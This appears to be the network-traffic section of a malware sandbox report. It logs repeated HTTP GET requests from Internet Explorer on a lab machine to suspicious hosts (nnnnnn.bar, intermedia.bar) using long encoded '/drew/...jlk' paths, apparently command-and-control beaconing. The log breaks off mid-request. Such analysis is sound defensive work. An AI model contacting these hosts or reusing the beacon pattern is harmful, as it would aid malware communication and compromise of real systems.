                  Location: http://www.nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk
                  X-Served-By: Namecheap URL Forward
                  Data Ascii: <a href='http://www.nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk'>Found</a>.
                  Jan 21, 2022 07:54:21.944432020 CET12368INHTTP/1.1 302 Found
                  Server: nginx
                  Date: Fri, 21 Jan 2022 06:54:18 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 321
                  Connection: keep-alive
                  Location: http://www.nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk
                  X-Served-By: Namecheap URL Forward
                  Data Ascii: <a href='http://www.nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk'>Found</a>.
                  Jan 21, 2022 07:54:27.952430964 CET12379INHTTP/1.1 302 Found
                  Server: nginx
                  Date: Fri, 21 Jan 2022 06:54:18 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 321
                  Connection: keep-alive
                  Location: http://www.nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk
                  X-Served-By: Namecheap URL Forward
                  Data Ascii: <a href='http://www.nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk'>Found</a>.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  37 | 192.168.2.3 | 49866 | 198.54.117.216 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:54:20.027968884 CET12359OUTGET /drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Host: www.nnnnnn.bar


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  38 | 192.168.2.3 | 49867 | 198.54.117.216 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:54:20.208184958 CET12360OUTGET /drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Host: www.nnnnnn.bar


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  39 | 192.168.2.3 | 49868 | 198.54.117.216 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:54:20.530349016 CET12361OUTGET /drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Host: www.nnnnnn.bar


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  4 | 192.168.2.3 | 49748 | 31.41.46.120 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:52:32.101609945 CET1137OUTGET /drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  40 | 192.168.2.3 | 49869 | 198.54.117.216 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:54:20.702385902 CET12361OUTGET /drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Host: www.nnnnnn.bar


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  41 | 192.168.2.3 | 49870 | 198.54.117.216 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:54:21.035410881 CET12362OUTGET /drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Host: www.nnnnnn.bar


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  42 | 192.168.2.3 | 49871 | 198.54.117.216 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:54:21.206569910 CET12363OUTGET /drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Host: www.nnnnnn.bar


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  43 | 192.168.2.3 | 49872 | 198.54.117.216 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:54:21.547805071 CET12365OUTGET /drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Host: www.nnnnnn.bar


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  44 | 192.168.2.3 | 49874 | 162.255.119.177 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:54:21.549371004 CET12366OUTGET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:21.983202934 CET12369OUTGET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:22.516026974 CET12370OUTGET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:23.488868952 CET | 12372 | OUT | GET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:25.426733017 CET | 12376 | OUT | GET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:27.364140987 CET | 12378 | OUT | GET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:29.301879883 CET | 12380 | OUT | GET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:33.177171946 CET | 12381 | OUT | GET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:40.927906036 CET | 12383 | OUT | GET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  45 | 192.168.2.3 | 49877 | 162.255.119.177 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:54:21.575253963 CET | 12367 | OUT | GET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:22.014446020 CET | 12370 | OUT | GET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:22.531586885 CET | 12371 | OUT | GET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:23.488856077 CET | 12371 | OUT | GET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:25.379602909 CET | 12375 | OUT | GET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:27.270412922 CET | 12376 | OUT | GET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:29.161175013 CET | 12379 | OUT | GET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:32.942723036 CET | 12380 | OUT | GET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:40.493726969 CET | 12383 | OUT | GET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
